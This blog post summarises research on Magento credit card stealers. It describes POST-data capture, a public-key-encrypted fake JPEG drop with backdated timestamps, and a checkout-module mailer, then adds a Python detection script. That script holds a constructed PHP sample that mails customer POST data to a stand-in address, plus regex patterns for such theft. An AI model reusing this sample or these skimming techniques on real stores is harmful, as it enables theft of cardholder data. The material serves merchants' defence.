How Does the Magento Hack Work?
Ecommerce hacks are becoming increasingly common as more and more people choose to shop online. In his latest post on the Sucuri blog, Peter Gramantik highlights a growing trend of attacks on ecommerce sites, specifically by credit card stealers targeting the Magento platform. His findings are summarised here to help you protect your website from the latest Magento hack.
This is by no means an amateur operation. The methods that the attackers are using to cover their tracks are highly sophisticated, and Gramantik admits that there’s no way to tell whether or not the latest threat is affecting you until it’s too late. Small to medium merchants are particularly vulnerable, so it’s crucial that you understand the risks and remain vigilant at all times.
N.B. If you use an ecommerce platform other than Magento, don’t assume that you’re safe. While the examples here might refer to Magento, these kinds of threats can affect any ecommerce site so it’s important to be on your guard regardless of what platform you use.
The attacker appears to be exploiting a vulnerability in Magento itself, or in a module or extension commonly installed alongside it; the precise vulnerability is not known. What is known is that malicious code is injected into a core Magento file, allowing the attacker to capture personal information from every POST request.
A POST request is the HTTP request a browser sends when it submits data in the message body, for instance a form submission (including the checkout and billing forms) or a file upload. Hooking the code that handles POST data therefore hands the attacker every field the customer types.
How Do They Do This?
Gramantik gives two examples to show how this apparent vulnerability in Magento is being exploited.
In the first, the attacker encrypts the stolen data with a public key embedded in the injected code (the PUBLIC_KEY variable). With public-key encryption, anything encrypted under the public key can only be decrypted with the matching private key, which the attacker alone holds, so even a site owner who finds the stolen data cannot read it. The attacker covers his tracks by sending the malicious requests with a random User-Agent string, which makes them hard to spot in the logs, or at least easy to dismiss, and a custom request parameter controls storing and clearing the stolen information so that little trace of the activity remains.
Once the billing data has been processed, it is saved in a fake image file. The file is given a fake JPEG header so that it looks like an ordinary image, and its modification time is set back so that it appears not to have been touched for a long time. The attacker then downloads the ‘image’ and decrypts its contents with their private key.
The injected code can be placed in any core file that is loaded whenever the CMS starts. In the second example, the Checkout module is instead targeted with a mailer (a piece of code that sends email messages).
This time nothing is modified on disk: the mailer simply reads the data as the transaction is processed, without being detected, and sends it to the attacker’s email address in plaintext. The attack depends on a particular module. According to Gramantik:
“The attacker knows how the module works and the code it’s built on; all he needed to do was use the module’s own variable in which all the sensitive data is stored unprotected.”
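Neither variant announces itself, but both leave artefacts a merchant can look for: the first writes a file that carries a JPEG signature but no JPEG structure and whose modification time has been pushed back, the second adds mail-sending code to a checkout module that reads POST data. The script below is an added example (my own code, not from the Sucuri post or from Magento) that checks for exactly those artefacts. The JPEG walk is a real marker-segment parse; the timestamp check relies on the fact that `touch()` can backdate mtime but the kernel bumps ctime to the current time for that very call; the PHP check is a heuristic regex whose patterns (`openssl_public_encrypt`, `PUBLIC_KEY`, `mail(`, `$_POST`/`getPost`) are my assumptions about what such code would contain, not strings taken from the actual malware. All sample files are constructed inline.

```python
import os
import re
import struct
import tempfile
import time

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
IMAGE_EXT = {".jpg", ".jpeg"}


def jpeg_structure_ok(data: bytes) -> bool:
    """True only if `data` parses as a well-formed JPEG marker stream.

    A real JPEG is SOI, a chain of length-prefixed segments, an SOS segment
    followed by entropy-coded data, and EOI as the final two bytes. A file that
    merely starts with a JPEG signature and then carries an encrypted blob
    fails this walk almost immediately (the 'length' read is garbage).
    """
    if len(data) < 4 or data[:2] != JPEG_SOI:
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker == 0xD9:                       # EOI reached before any scan data
            return pos + 2 == len(data)
        if marker == 0xDA:                       # SOS: image data follows until EOI
            return data.endswith(JPEG_EOI)
        if marker == 0xFF:                       # fill byte, skip one
            pos += 1
            continue
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:   # stand-alone markers
            pos += 2
            continue
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if seg_len < 2:
            return False
        pos += 2 + seg_len
    return False


def backdated_mtime(st: os.stat_result, slack: int = 86400) -> bool:
    """mtime far behind ctime: touch() can set any past mtime, but the kernel
    sets ctime to 'now' when it does so. Caveat: restores from backup and some
    copy tools produce the same signature, so treat this as a triage signal."""
    return st.st_mtime < st.st_ctime - slack


# Heuristic markers (assumed, not the real stealer's strings): encrypt/mail
# code in the same file that reads request POST data.
STEALER_MARKERS = re.compile(r"openssl_public_encrypt\s*\(|\bmail\s*\(|PUBLIC_KEY", re.I)
POST_READ = re.compile(r"\$_POST\b|getPost\s*\(|getParams\s*\(")


def php_looks_like_stealer(src: str) -> bool:
    return bool(STEALER_MARKERS.search(src) and POST_READ.search(src))


def scan_path(path: str) -> list:
    """Return the list of findings for one file (empty list means clean)."""
    findings = []
    st = os.stat(path)
    if os.path.splitext(path)[1].lower() in IMAGE_EXT:
        with open(path, "rb") as f:
            data = f.read()
        if not jpeg_structure_ok(data):
            findings.append("jpeg_signature_without_jpeg_structure")
    if backdated_mtime(st):
        findings.append("mtime_far_older_than_ctime")
    if path.endswith(".php"):
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            if php_looks_like_stealer(f.read()):
                findings.append("php_reads_post_and_exfiltrates")
    return findings


# Constructed samples: a minimal real JPEG (APP0 + SOS + EOI) and a fake one
# that is just the signature followed by an opaque blob.
REAL_JPEG = (JPEG_SOI + b"\xff\xe0" + struct.pack(">H", 16)
             + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
             + b"\x12\x34" + JPEG_EOI)
FAKE_JPEG = JPEG_SOI + b"\xff\xe0" + b"U2FsdGVkX1+constructed+ciphertext+blob=="
SAMPLE_MAILER_PHP = """<?php
// constructed sample of the second variant, NOT the code from the post
$data = $this->getRequest()->getPost();
mail('drop@example.com', 'cc', serialize($data));
"""


def demo() -> dict:
    """Write the samples into a temp dir, backdate the fake image, scan all."""
    with tempfile.TemporaryDirectory() as d:
        real, fake, php = (os.path.join(d, n) for n in ("logo.jpg", "cache.jpg", "Onepage.php"))
        open(real, "wb").write(REAL_JPEG)
        open(fake, "wb").write(FAKE_JPEG)
        open(php, "w").write(SAMPLE_MAILER_PHP)
        old = time.time() - 400 * 86400          # the attacker's touch() equivalent
        os.utime(fake, (old, old))
        return {"real": scan_path(real), "fake": scan_path(fake), "php": scan_path(php)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "clean")
```

Run it over `media/` and `app/code/` rather than the temp dir to use it for real; a hit on the JPEG check is close to conclusive (real images do not fail the marker walk), while the timestamp and PHP regex hits need a human look, since backups, restores and legitimate mailer code trip them too.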
What Are The Risks?
In the words of the Payment Card Industry:
“Small merchants are prime targets for data thieves. It’s your job to protect cardholder data at the point-of-sale. If cardholder data is stolen – and it’s your fault [which it would be in this case] – you could incur fines, penalties, even termination of the right to accept payment cards!”
So What Can You Do?
Merchants need to do everything they can to secure the environment for their processed data. Here’s what you should do:
- Make sure your site is PCI (Payment Card Industry) compliant (which it should be anyway, regardless of the scope of your e-commerce business).
- Look at alternative payment gateways, e.g. PayPal, so that the payment details aren’t actually being entered via your own website.
- Use good, unique passwords for every element of your site – CMS, hosting, payment services and so on.
Finally, to reiterate my earlier point, make sure you’re aware of the risks and keep an eye out for any potential threats. Ensure that you have someone on hand who can deal with a security incident quickly and effectively.
As Gramantik puts it, “Keep your eyes open and stay safe!”
You can read the article in full here.